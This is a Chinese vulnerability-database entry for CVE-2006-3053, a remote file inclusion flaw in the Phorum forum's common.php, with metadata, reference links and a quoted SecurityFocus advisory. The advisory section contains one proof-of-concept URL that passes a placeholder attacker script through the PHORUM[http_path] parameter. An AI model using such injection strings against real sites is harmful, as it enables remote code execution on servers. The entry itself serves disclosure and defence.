Phorum common.php 远程文件包含漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1109865 漏洞类型 输入验证
发布时间 2006-03-06 更新时间 2006-06-23
CVE编号 CVE-2006-3053 CNNVD-ID CNNVD-200606-330
漏洞平台 PHP CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/27363
https://cxsecurity.com/issue/WLB-2006060108
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200606-330
|漏洞详情
Phorum是一款基于PHP的WEB论坛程序,可在Linux和Unix操作系统下使用,也可在MicrosoftWindows操作系统下使用。Phorum处理用户请求时存在输入验证漏洞,远程攻击者可能利用此漏洞在服务器上以Web进程权限执行任意命令。Phorum的common.php脚本没有对$PHORUM[“http_path”]变量做充分的检查过滤,远程攻击者可能利用此漏洞使Phorum包含远程服务器上的脚本文件执行。
|漏洞EXP
source: http://www.securityfocus.com/bid/16977/info

The PHORUM application is prone to a remote file-include vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input.

An attacker can exploit this issue to include an arbitrary remote file containing malicious PHP code and execute it in the context of the webserver process. This may facilitate a compromise of the application and the underlying system; other attacks are also possible.

This issue is reported to affect versions 5.1.13 and prior; other versions may also be vulnerable.

NOTE: The vendor reports that this issue cannot be exploited due to security restrictions placed on 'common.php'; therefore, this BID is being retired.

http://www.example.com/[phorum_path]/common.php?PHORUM[http_path]=[evil_scripts]
|参考资料

来源:XF
名称:phorum-common-file-include(27064)
链接:http://xforce.iss.net/xforce/xfdb/27064
来源:BID
名称:16977
链接:http://www.securityfocus.com/bid/16977
来源:BUGTRAQ
名称:20060619Re:#MHGSecurityTeam---PHORUM5.1.13RemoteFileInc.
链接:http://www.securityfocus.com/archive/1/archive/1/437988/100/0/threaded
来源:BUGTRAQ
名称:20060611#MHGSecurityTeam---PHORUM5.1.13RemoteFileInc.
链接:http://www.securityfocus.com/archive/1/archive/1/436863/100/0/threaded
来源:SREASON
名称:1103
链接:http://securityreason.com/securityalert/1103